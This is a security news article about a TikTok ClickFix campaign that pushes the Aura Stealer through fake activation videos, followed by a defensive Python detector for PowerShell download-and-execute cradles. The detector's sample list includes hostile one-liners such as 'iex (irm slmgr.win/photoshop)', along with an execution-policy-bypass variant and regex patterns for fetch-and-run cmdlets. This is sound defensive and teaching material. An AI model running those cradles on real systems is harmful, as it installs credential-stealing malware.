Cybercriminals are abusing TikTok by posting fake software-activation guides that lead viewers to install malware. The videos instruct users to run PowerShell commands that reach out to attacker-controlled domains and pull down the payloads.
Malicious Commands and Impact
The campaign was first documented by security researcher Xavier Mertens. The commands, presented as activation shortcuts, download malicious payloads. One of them, updater.exe, is a variant of the Aura Stealer, which harvests saved passwords, browser cookies, cryptocurrency wallets, and authentication tokens. Another, source.exe, invokes the C# compiler to build and run code on the victim's machine, which lets it execute stealthily and gives the attacker a path to cryptocurrency theft or ransomware deployment.
ClickFix Tactic
Experts classify this tactic as a ClickFix attack: social engineering that convinces the victim a single pasted command will unlock premium software features. The videos typically tell viewers to run a PowerShell one-liner that fetches a script or executable from a Cloudflare-hosted page on a dubious remote domain such as slmgr.win.
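The one-liner pattern described above (fetch remote content, then evaluate it) is what a defender should hunt for in PowerShell script block logs (Event ID 4104, Microsoft-Windows-PowerShell/Operational). The following detector is an added example written for this page, not code from the article or the researcher; the sample script blocks, the exact wording of the TikTok commands, the allowlisted hosts and the IP address are constructed assumptions, and only the slmgr.win domain comes from the article.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample ScriptBlockText values, shaped like what PowerShell
# Event ID 4104 records when script block logging is enabled. The exact
# command wording used in the TikTok videos is an assumption, not a capture.
SAMPLE_SCRIPT_BLOCKS = [
    "iex (irm slmgr.win/photoshop)",
    'powershell -ep bypass -c "Invoke-Expression (Invoke-RestMethod https://slmgr.win/ps)"',
    "Get-ChildItem C:\\Users | Sort-Object LastWriteTime",
    "Invoke-WebRequest https://download.microsoft.com/setup.msi -OutFile setup.msi",
    '$r = iwr "http://185.0.0.1/x"; iex $r.Content',
]

# Hosts a hypothetical organisation permits scripts to be fetched from.
ALLOWED_HOSTS = {"download.microsoft.com", "www.powershellgallery.com"}

# Cmdlets and aliases that evaluate text as code.
EXEC_RE = re.compile(r"\b(?:iex|invoke-expression)\b", re.I)
# Cmdlets, aliases and .NET methods that fetch content over HTTP.
FETCH_RE = re.compile(
    r"\b(?:irm|invoke-restmethod|iwr|invoke-webrequest|curl|wget|downloadstring|downloadfile)\b",
    re.I,
)
# First host name or IPv4 literal followed by a path. The scheme is optional
# because irm/iwr accept a bare "host/path", which is how the one-liners are written.
HOST_RE = re.compile(
    r"(?:https?://)?([a-z0-9-]+(?:\.[a-z0-9-]+)*\.[a-z]{2,}|\d{1,3}(?:\.\d{1,3}){3})(?::\d+)?/",
    re.I,
)
BYPASS_RE = re.compile(r"-(?:ep|executionpolicy)\s+bypass\b", re.I)


@dataclass
class Finding:
    script: str
    host: Optional[str]
    reason: str


def extract_host(script: str) -> Optional[str]:
    """Return the first host or IP the command fetches from, if any."""
    m = HOST_RE.search(script)
    return m.group(1).lower() if m else None


def is_download_cradle(script: str) -> bool:
    """True when the command both fetches remote content and evaluates it."""
    return bool(EXEC_RE.search(script) and FETCH_RE.search(script))


def classify(script: str) -> Optional[Finding]:
    """Flag download-and-execute cradles to unknown hosts and policy bypasses."""
    host = extract_host(script)
    if is_download_cradle(script):
        if host in ALLOWED_HOSTS:
            return None  # fetching from an approved host: treat as benign
        return Finding(script, host, "download-and-execute cradle from non-allowlisted host")
    if BYPASS_RE.search(script):
        return Finding(script, host, "execution policy bypass")
    return None


def scan(blocks: List[str]) -> List[Finding]:
    """Run classify() over a batch of script block texts and keep the hits."""
    return [f for f in (classify(b) for b in blocks) if f is not None]


if __name__ == "__main__":
    for f in scan(SAMPLE_SCRIPT_BLOCKS):
        print(f"[{f.reason}] host={f.host!r}: {f.script}")
```

Run against the constructed samples, the detector flags the two slmgr.win cradles and the IP-literal cradle, while the plain directory listing and the -OutFile download from an allowlisted host pass. The allowlist is the tuning knob: an environment that never expects scripts to be pulled from the internet should leave it empty and flag every cradle.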
Security Recommendations
- Never run PowerShell commands copied from TikTok videos or other untrusted sources.
- Download software only from the vendor's official website or a legitimate app store.
- Keep antivirus, browsers, and operating systems fully updated.
- Use antivirus software with real-time protection enabled.
- Consider a data removal service to monitor where your personal data is exposed online.
- If you already ran one of these commands, assume saved passwords, cookies, and tokens are compromised: from a clean device, change passwords starting with the most sensitive accounts (email, banking, crypto) and sign out of all active sessions.
- Enable multi-factor authentication on every account that supports it.
TikTok remains an attractive platform for scammers because of its global reach, so trust only verified sources. There is no legitimate "free activation" shortcut; any video promising one should be treated as malicious.